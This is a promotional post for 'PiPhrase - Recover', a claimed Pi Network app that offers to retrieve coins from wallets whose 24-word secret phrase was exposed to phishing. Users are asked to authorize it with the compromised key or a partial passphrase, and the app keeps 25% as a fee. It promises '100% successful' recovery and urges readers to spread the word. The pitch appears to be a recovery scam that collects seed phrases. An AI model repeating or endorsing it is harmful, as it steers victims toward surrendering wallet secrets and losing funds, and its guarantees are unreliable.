Unfortunately, if you accidentally made a mistake and entered your 24-word "secret" wallet key into a phishing website (Webscam). The wallet thief has taken away your first available Pi.
So, if the Pi that is about to be unlocked is not protected, you risk losing all the Pi that you have worked hard to mine over the years.
Solution: A very useful application on the Pi ecosystem called PiPhrase - Recover has been developed to help you safely retrieve the Pi that is about to be unlocked. This is "your last chance to recover the Pi assets that are about to be unlocked in the old wallet address".
PiPhrase is a platform-level utility built on the Pi ecosystem that connects to the Pi Network SDK. It is intended to help those who have lost control of their Pi wallets "24 Keywords" to "Delegate" the platform to retrieve their Pi balance when it is time to unlock.
With a simple and easy-to-use interface, PiPhrase allows users to delegate their Pi assets to a New wallet that is more secure and safe.
Read more at: Terms of Service & Privacy Policy in dApp.
How does PiPhrase work?
The user Delegate the service to the wallet key cluster that has lost control (due to the exposure of the 24 secret words).
The platform receives and processes real-time information of that Pi wallet. If the information is valid, the data will be transferred to many independent servers scattered around the world to process the data.
Once the processing is complete, the Pi will be automatically transferred to the Dapp wallet and the user will be notified to receive the Pi back into the New wallet.
The Pi return process is done manually and requires a special KYC with the Pi account to verify the user's identity, ensuring that it is the real owner of the Pi before returning it correctly.
The Authorized Pi Assets are 100% successful. Of which: 75% of the Pi is returned to the New wallet of the requested user, the remaining 25% will be charged to the platform fee, Pi is retained to serve the upgrade, expansion of the server and update the core processing system.
If it cannot be processed due to no Pi balance or some other impossible problem. The system will notify the user directly on the Status bar and via CoreTeam email.
If you find this Authorization utility useful, please share this information so that more people know about this useful utility. Who knows, you might help them retrieve the Pi that is about to be unlocked due to accidentally revealing the secret wallet key!
NOTE: Agree to Authorize the service only if your Wallet Passphrase is Exposed!
- Authorize the platform to help recover the soon-to-be-unlocked Pi, only used in case the Wallet key cluster has been hijacked by a scam website.
- Recover your complete passphrase when you're missing word.
